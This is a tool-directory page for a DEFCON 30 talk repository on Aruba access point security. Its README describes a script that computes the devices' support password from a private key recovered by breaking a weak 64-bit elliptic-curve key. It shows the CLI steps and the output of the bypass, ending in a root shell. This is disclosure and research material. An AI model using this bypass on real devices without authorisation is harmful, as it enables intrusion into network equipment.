Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
bugstropics — Supporting material for the "Hunting Bugs In The Tropics" DEFCON 30 talk | Kitploit
Tools/GitHubGitHub/dozernz/bugstropics
Embedded Systems SecurityPassword AttacksVulnerability AnalysisExploitationWireless SecurityCryptographyHardware & IoT Security
GitHubdozernz/bugstropics

bugstropics

Supporting material for the "Hunting Bugs In The Tropics" DEFCON 30 talk

View Repository
12774 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Hunting Bugs in the Tropics

This is a repo with the slides used in my presentation "Hunting Bugs in the Tropics" at DEFCON30. It includes the Python script used to calculate the support password based on the private key obtained by breaking Aruba support's EC public key, due to its weak size (64 bits). This allows you to break out of the subshell on these devices, and obtain a full root shell.

You can use it running support on the AP CLI, and supplying an arbitrary username:

root@kitploit:~
# support
Username (Please enter with @domain.com, in lowercase): a

Token: ED14-B132-D4BB-D428
Please generate one time password at https://ase.arubanetworks.com/decode_aos_key
Support Password:

then passing the username and Token value to the support-access.py script in this repository.

root@kitploit:~
$ ./support-access.py a ED14-B132-D4BB-D428
Password: 4197d68283f73d5c

Paste the response as the Support Password:

root@kitploit:~
Support Password: 4197d68283f73d5c
Switching to Full Access
~ # whoami
root
Download Tool